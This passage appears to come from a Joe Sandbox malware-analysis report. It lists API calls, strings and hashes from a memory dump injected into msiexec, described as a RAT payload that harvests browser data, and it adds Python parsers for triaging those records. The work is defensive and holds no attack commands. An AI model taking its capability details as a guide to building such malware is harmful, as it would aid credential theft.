                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                            • String ID: advapi32.dll
                                                                                            • API String ID: 2012295524-4050573280
                                                                                            • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                            • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                            • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
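Three of the function records above are worth pulling out of the listing by hand: the routine at 00418836 that copies GetSystemTime (16 bytes), GetCurrentProcessId (4), GetTickCount (4) and QueryPerformanceCounter (8) into one 32-byte buffer, the memcpy routine at 00430D77 that references a `CREATE TABLE` literal, and the routine at 00404398 that resolves five imports with GetProcAddress after a subcall loads advapi32.dll. Doing that across thousands of records needs a parser. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of its IDA plugin output. It assumes the record layout exactly as rendered here (a `•` bullet per call or field, `Name.Module(args), ref: VA` call lines, `Part of subcall function` prefixes, and an `Offset:` in the Source File field giving the dump base), and the three triage labels it emits are this example's own heuristics, not verdicts from the report. The embedded sample is those three records copied from this section with the hash lines trimmed.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: three records copied from this section of the report
# (msiexec dump, base 0x400000), trimmed to the lines the parser uses.
SAMPLE_RECORDS = r"""
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
APIs
• memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
• Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
APIs
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• String ID: advapi32.dll
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
"""

# One reported call: "• Name.Module(args), ref: VA", optionally prefixed with
# "Part of subcall function XXXXXXXX:" when the call is made by a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                       # virtual address of the call site
    subcall: Optional[int] = None  # callee address when reported as "Part of subcall"

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def image_base(self) -> int:
        m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else 0

    def rva(self, va: int) -> int:
        return va - self.image_base

    @property
    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall is None]

    @property
    def string_ids(self) -> List[str]:
        return [s for s in self.fields.get("String ID", "").split("$") if s]  # '$'-joined by the report

def parse_records(text: str) -> List[FunctionRecord]:
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()                      # the rendered listing is heavily indented
        if line == "APIs":                      # every record opens with its APIs block
            cur = FunctionRecord()
            records.append(cur)
        elif not line or cur is None or line in HEADERS:
            continue
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif (m := FIELD_LINE.match(line)):
            cur.fields[m["key"].strip()] = m["val"].strip()
    return records

def memcpy_bytes(rec: FunctionRecord) -> int:
    """Sum the literal size arguments of the record's direct memcpy calls; '?' sizes are skipped."""
    return sum(int(c.args[2], 16) for c in rec.direct_calls
               if c.name == "memcpy" and len(c.args) >= 3 and re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[2]))

def triage(rec: FunctionRecord) -> List[str]:
    """Analyst heuristics; these labels are this example's assumptions, not report verdicts."""
    flags, direct, seen = [], [c.name for c in rec.direct_calls], {c.name for c in rec.calls}
    if direct.count("GetProcAddress") >= 3:
        flags.append("dynamic-api-resolution")   # imports resolved at run time rather than via the IAT
    if {"GetSystemTime", "GetCurrentProcessId", "GetTickCount", "QueryPerformanceCounter"} <= seen and "memcpy" in direct:
        flags.append("volatile-seed-material")   # time/PID/tick/QPC copied into one buffer
    if any(s.startswith("CREATE TABLE") for s in rec.string_ids):
        flags.append("sql-schema-literal")       # SQL DDL inside a RAT payload deserves a look
    return flags

if __name__ == "__main__":
    for rec in parse_records(SAMPLE_RECORDS):
        first = rec.direct_calls[0]
        print(f"{rec.fields['Opcode ID'][:12]} rva={rec.rva(first.ref):#x} "
              f"memcpy={memcpy_bytes(rec)}B flags={triage(rec)}")
```

Fed the whole listing, the parser turns each record into call-site RVAs (VA minus the 00400000 base from the Source File field, so they can be matched against a clean dump or an IDA database) and a short flag list. The flags are leads, not conclusions: the API list alone shows that 32 bytes of process-unique, time-varying values are gathered at 00418836, not what they are used for, and a `CREATE TABLE` literal only says the code handles SQL schema, which fits the report's browser-data-harvesting signatures but is not proven by this record by itself.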
                                                                                            Strings
                                                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                            • <%s>, xrefs: 004100A6
                                                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                            • API String ID: 3473751417-2880344631
                                                                                            • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                            • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                            • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$_snwprintfmemset
                                                                                            • String ID: %2.2X
                                                                                            • API String ID: 2521778956-791839006
                                                                                            • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                            • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfwcscpy
                                                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                                                            • API String ID: 999028693-502967061
                                                                                            • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                            • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                            APIs
                                                                                            • strlen.MSVCRT ref: 00408DFA
                                                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                            • memset.MSVCRT ref: 00408E46
                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memsetstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2350177629-0
                                                                                            • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                            • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                            • API String ID: 2221118986-1606337402
                                                                                            • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                            • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                            APIs
                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                            • memset.MSVCRT ref: 00408FD4
                                                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                            • memset.MSVCRT ref: 00409042
                                                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 265355444-0
                                                                                            • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                            • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004116FF
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                            • API String ID: 2618321458-3614832568
                                                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFilefreememset
                                                                                            • String ID:
                                                                                            • API String ID: 2507021081-0
                                                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                            • malloc.MSVCRT ref: 00417524
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                            • free.MSVCRT ref: 00417544
                                                                                            • free.MSVCRT ref: 00417562
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4131324427-0
                                                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                            • free.MSVCRT ref: 0041822B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: PathTemp$free
                                                                                            • String ID: %s\etilqs_$etilqs_
                                                                                            • API String ID: 924794160-1420421710
                                                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040FDD5
                                                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,<,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                                                            • API String ID: 1775345501-2769808009
                                                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastMessage_snwprintf
                                                                                            • String ID: Error$Error %d: %s
                                                                                            • API String ID: 313946961-1552265934
                                                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: foreign key constraint failed$new$oid$old
                                                                                            • API String ID: 0-1953309616
                                                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                            APIs
                                                                                            Strings
                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                            • API String ID: 3510742995-272990098
                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                            • memset.MSVCRT ref: 0040C439
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            • memset.MSVCRT ref: 0040C4D0
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1265369119-0
                                                                                            • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                            • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
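Blocks like the one above are raw plugin output, and the interesting question for a practitioner is which of the hundreds of functions in this dump touch credentials, registry or browser artefacts. The following triage helper is an added example written for this page, not part of Joe Sandbox or of the report: it parses these APIs / Strings / Similarity blocks, keeps direct calls apart from `Part of subcall function` lines, splits the `$`-joined String ID field, and flags capabilities from a small rule map. The rule map, the names `parse_blocks`, `classify`, `triage` and `CAPABILITY_RULES`, and the reading of the foreign-key text as SQLite error messages are this example's own assumptions; the sample input is three blocks copied from this listing and trimmed.

```python
"""Triage helper for the Joe Sandbox IDA-plugin listing above. Added example, not
part of the report or of Joe Sandbox: parses APIs / Strings / Similarity blocks,
splits the '$'-joined String ID and flags capabilities from an assumed rule map."""
import re
from dataclasses import dataclass, field

# Constructed sample: three blocks copied from the listing above, trimmed.
SAMPLE_LISTING = """\
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?), ref: 0040C4FB
Memory Dump Source
• Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: free$EnumValuememset$_wcsuprmemcpywcslen
• String ID:
• API String ID: 1265369119-0
APIs
Strings
Similarity
• API ID: _memicmpwcslen
• String ID: @@@@$History
• API String ID: 1872909662-685208920
APIs
Strings
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_CALL = re.compile(r"^• (?P<api>[^\s(]+?)\.(?P<mod>[A-Za-z0-9]+)(?=[\s(])")
SUBCALL = re.compile(r"^• Part of subcall function (?P<fn>[0-9A-F]+): (?P<api>[^\s(]+?)\.(?P<mod>[A-Za-z0-9]+)")
STRING_LINE = re.compile(r"^• (?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")
SIM_FIELD = re.compile(r"^• (?P<key>[A-Za-z ]+ ID): ?(?P<val>.*)$")


@dataclass
class FunctionBlock:
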